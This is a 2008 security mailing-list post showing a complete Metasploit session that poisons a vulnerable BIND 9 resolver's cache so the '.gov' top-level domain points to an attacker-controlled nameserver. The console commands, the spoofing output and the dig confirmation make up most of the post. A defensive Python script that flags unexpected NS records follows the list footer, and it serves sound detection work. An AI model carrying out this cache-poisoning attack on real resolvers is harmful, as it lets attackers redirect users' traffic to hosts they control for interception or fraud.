Dailydave mailing list archives

Re: DNS and other fun.


From: H D Moore <dailydave () digitaloffense net>
Date: Tue, 29 Jul 2008 16:59:00 -0500

Below is an example of poisoning ".gov" on a vulnerable BIND 9 instance.

This took about two minutes, no crazy fast packet generation required.

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN gov
DOMAIN => net
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > set NEWDNS msfdns.ath.cx
NEWDNS => msfdns.ath.cx
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Warning: target address A.B.C.D is not the same as the nameserver's query source address 72.48.121.197!
[*] Targeting nameserver A.B.C.D for injection of gov. nameservers as msfdns.ath.cx
[*] Querying recon nameserver for gov.'s nameservers...
[*]  Got an NS record: gov.                    172717  IN      NS      F.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of F.GOV.ZONEEDIT.COM....
[*]    Got an A record: F.GOV.ZONEEDIT.COM.     172717  IN      A       66.197.185.229
[*]     Checking Authoritativeness: Querying 66.197.185.229 for gov....
[*]     F.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      G.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of G.GOV.ZONEEDIT.COM....
[*]    Got an A record: G.GOV.ZONEEDIT.COM.     172717  IN      A       66.135.32.100
[*]     Checking Authoritativeness: Querying 66.135.32.100 for gov....
[*]     G.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      C.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of C.GOV.ZONEEDIT.COM....
[*]    Got an A record: C.GOV.ZONEEDIT.COM.     172716  IN      A       69.72.142.35
[*]     Checking Authoritativeness: Querying 69.72.142.35 for gov....
[*]     C.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      E.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of E.GOV.ZONEEDIT.COM....
[*]    Got an A record: E.GOV.ZONEEDIT.COM.     172716  IN      A       82.165.40.134
[*]     Checking Authoritativeness: Querying 82.165.40.134 for gov....
[*]     E.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      D.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of D.GOV.ZONEEDIT.COM....
[*]    Got an A record: D.GOV.ZONEEDIT.COM.     172716  IN      A       209.97.207.48
[*]     Checking Authoritativeness: Querying 209.97.207.48 for gov....
[*]     D.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      A.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of A.GOV.ZONEEDIT.COM....
[*]    Got an A record: A.GOV.ZONEEDIT.COM.     172716  IN      A       216.55.155.29
[*]     Checking Authoritativeness: Querying 216.55.155.29 for gov....
[*]     A.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      B.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of B.GOV.ZONEEDIT.COM....
[*]    Got an A record: B.GOV.ZONEEDIT.COM.     172715  IN      A       206.51.224.229
[*]     Checking Authoritativeness: Querying 206.51.224.229 for gov....
[*]     B.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Calculating the number of spoofed replies to send per query...
[*]   race calc: 100 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 2/118/24
[*] Sending 5 spoofed replies from each nameserver (7) for each query
[*] Attempting to inject poison records for gov.'s nameservers into A.B.C.D:48178...
[*] Sent 1000 queries and 35000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.01/0.11/0.03 | min/max/avg replies: 8/54/22
[*] Now sending 4 spoofed replies from each nameserver (7) for each query
[*] Sent 2000 queries and 63000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.01/0.1/0.02 | min/max/avg replies: 3/35/16
[*] Now sending 3 spoofed replies from each nameserver (7) for each query
[*] Sent 3000 queries and 84000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.01/0.14/0.03 | min/max/avg replies: 3/72/21
[*] Now sending 4 spoofed replies from each nameserver (7) for each query
[*] Sent 4000 queries and 112000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.02/0.08/0.03 | min/max/avg replies: 8/40/28
[*] Now sending 6 spoofed replies from each nameserver (7) for each query
[*] Poisoning successful after 4000 queries and 112000 responses: gov. == msfdns.ath.cx
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D
[*] exec: dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D


; <<>> DiG 9.3.2 <<>> -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5757
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;poisoning_tlds_is_fun_and_fast.gov. IN A

;; ANSWER SECTION:
poisoning_tlds_is_fun_and_fast.gov. 60 IN A     1.3.3.7

;; AUTHORITY SECTION:
gov.                    41938   IN      NS      msfdns.ath.cx.

;; ADDITIONAL SECTION:
msfdns.ath.cx.          3       IN      A       71.41.138.124

;; Query time: 23 msec
;; SERVER: A.B.C.D#53(A.B.C.D)
;; WHEN: Tue Jul 29 16:55:08 2008
;; MSG SIZE  rcvd: 111

poisoning_tlds_is_fun_and_fast.gov = 1.3.3.7
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
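As an added defender-side check (example code, not from the post or from Metasploit), the following parses dig's text output and flags any NS record a resolver reports for a zone that is not in that zone's known delegation; the expected set is the seven ZONEEDIT servers the recon output above enumerated, and the sample is the poisoned answer shown in the post.

```python
# Added example (not from the post or from Metasploit): parse `dig` text
# output and flag AUTHORITY-section NS records for a zone that are not in
# the zone's known delegation (here, the ZONEEDIT servers from the post).
import re

NS_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+NS\s+(\S+)\s*$")

def parse_sections(dig_output):
    """Return {section_name: [record lines]} from dig's text output."""
    sections, current = {}, None
    for line in dig_output.splitlines():
        m = re.match(r"^;; (\w+) SECTION:", line)
        if m:
            current = m.group(1)
            sections[current] = []
        elif current and line.strip() and not line.startswith(";"):
            sections[current].append(line.rstrip())
    return sections

def cached_ns(dig_output, zone):
    """NS targets (lower-cased) the resolver reports for `zone` in AUTHORITY."""
    zone = zone.lower().rstrip(".") + "."
    found = set()
    for line in parse_sections(dig_output).get("AUTHORITY", []):
        m = NS_RE.match(line)
        if m and m.group(1).lower() == zone:
            found.add(m.group(2).lower())
    return found

def unexpected_ns(dig_output, zone, expected):
    """Cached NS names for `zone` that are not in the known delegation."""
    expected = {n.lower().rstrip(".") + "." for n in expected}
    return cached_ns(dig_output, zone) - expected

# Known delegation for gov. as enumerated by the recon step in the post.
EXPECTED_GOV_NS = ["%s.GOV.ZONEEDIT.COM." % c for c in "ABCDEFG"]

# Answer as shown in the post, after poisoning (ANSWER/AUTHORITY only).
SAMPLE_DIG = """\
;; ANSWER SECTION:
poisoning_tlds_is_fun_and_fast.gov. 60 IN A     1.3.3.7

;; AUTHORITY SECTION:
gov.                    41938   IN      NS      msfdns.ath.cx.
"""

if __name__ == "__main__":
    bad = unexpected_ns(SAMPLE_DIG, "gov", EXPECTED_GOV_NS)
    print("unexpected NS for gov.:", sorted(bad) or "none")
```

Feed it the output of a periodic `dig -t ns gov @resolver` and any non-empty result is a cached delegation that should not be there.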